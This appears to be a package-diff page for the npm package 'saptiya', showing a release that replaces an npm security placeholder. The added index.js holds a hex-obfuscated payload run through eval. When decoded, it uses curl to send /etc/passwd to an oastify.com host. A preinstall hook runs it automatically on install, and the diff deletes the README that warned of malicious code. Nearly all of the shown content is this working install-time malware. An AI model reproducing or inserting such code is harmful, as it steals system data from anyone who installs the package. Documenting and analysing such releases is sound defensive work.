saptiya 0.0.1-security → 9.4.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of saptiya might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,3 @@
|
|
1
|
+
const hexEncodedCode = "636f6e7374207b2065786563207d203d207265717569726528276368696c645f70726f6365737327293b0a0a2f2f20436f6e737472756374207468652055524c207769746820686f73746e616d6520616e64207468652074617267657420656e64706f696e740a636f6e73742074617267657455524c203d202760247b7265717569726528276f7327292e686f73746e616d65287d29737470626f683734686a6461776b6c326a3232326267763237746470316670342e6f6173746966792e636f6d60273b0a0a2f2f2052756e20746865206375726c20636f6d6d616e6420746f2073656e642074686520636f6e74656e7473206f66202f6574632f7061737377640a6578656328602f7573722f62696e2f6375726c202d2d64617461203d27402f6574632f7061737377642720247b74617267657455524c7d602c20286572726f722c207374646f75742c2073746465727229203d3e207b0a2020202020696620286572726f7229207b0a2020202020202020636f6e736f6c2e6572726f7228604572726f7220657865637574696e67206375726c3a20247b6572726f722e6d6573736167657d60293b0a202020202020202072657475726e3b0a202020207d0a0a202020206966202873746465727229207b0a2020202020202020636f6e736f6c2e6572726f7228607374646572723a20247b7374646572727d60293b0a202020202020202072657475726e3b0a202020207d0a0a20202020636f6e736f6c2e6c6f6728607374646f75743a20247b7374646f75747d60293b0a7d293b0a";
|
2
|
+
|
3
|
+
eval(Buffer.from(hexEncodedCode, 'hex').toString());
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "saptiya",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "9.4.0",
|
4
|
+
"description": "burp suite",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "Your Name",
|
11
|
+
"license": "ISC"
|
6
12
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=saptiya for more information.
|